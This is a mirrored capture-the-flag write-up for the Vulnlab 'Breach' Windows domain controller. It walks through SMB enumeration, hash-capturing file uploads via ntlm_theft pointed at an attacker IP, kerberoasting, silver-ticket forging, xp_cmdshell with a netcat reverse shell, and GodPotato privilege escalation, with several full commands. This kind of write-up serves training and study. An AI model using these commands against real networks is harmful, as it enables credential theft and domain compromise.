Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-12 23:47:05 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/Vulnlab/Breach.md
ARZ 6785d23d1f
Rename Breach.vl to Breach.md
2024-03-12 23:15:24 +03:00

4.4 KiB
Raw Blame History

Vulnlab - Breach

PORT     STATE SERVICE       VERSION 
53/tcp   open  domain? 
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-12 16:03:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?              
464/tcp  open  kpasswd5?                                    
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-03-12T16:45:02+00:00; -20s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback 
| Issuer: commonName=SSL_Self_Signed_Fallback
3389/tcp open  ms-wbt-server Microsoft Terminal Services 
|_ssl-date: 2024-03-12T16:06:32+00:00; -20s from scanner time.
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-11T16:03:04
| Not valid after:  2024-09-10T16:03:04
| MD5:   6bef15efd66e365df68a7dc73029cee7
|_SHA-1: 7fce3649341af1319d2092a07f42efd473427203
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-03-12T16:05:52+00:00
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Accessing smb shares with null authentication, we'll be able to list available shares

From share , we'll get 3 username directories

We could have gotten domain users from brute forcing SID as well with lookupsid.py

We can try AS-REP roasting but this didn't showed any user with pre-authentication not required

Coercing Authentication

In share, we have write access so we can upload files in any folder other than user directories as we don't have read access there

So we can perform coerce authentication by uploading scf or lnk files but I am not sure which extension will lead to coercion so we can use ntlm_theft to upload all kinds of extension for this

python3 ./ntlm_theft.py --generate all --server 10.8.0.136 -f @a

As soon as we'll upload the file, we'll receive NTLMv2 challenge/response hash of Julia.Wong

This will get cracked easily through hashcat using rockyou.txt ## Performing kerberoasting on mssql user

We already saw that there was svc_mssql, it's most likely a service account which can be kerberoastable

crackmapexec ldap breach.vl -u 'julia.wong' -p 'password' --kerberoasting kerberoast.txt

Cracking this again with hashcat

With these credentials we can try logging in on MSSQL service with mssqclient.py , but it gives us login failure

Since we have the mssql service account, we can forge a silver ticket and impersonate administrator user on mssql

ticketer.py -nthash hash -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn 'MSSQL/breach.vl' administrator

Now we just need to enable xp_cmdshell as it's disabled by default

Downloading and executing netcat to get a reverse shell

This user has SeImpersonate privilege enabled through which we can impersonate/steal the token of any user including SYSTEM user

Using GodPotato to escalate our privileges

References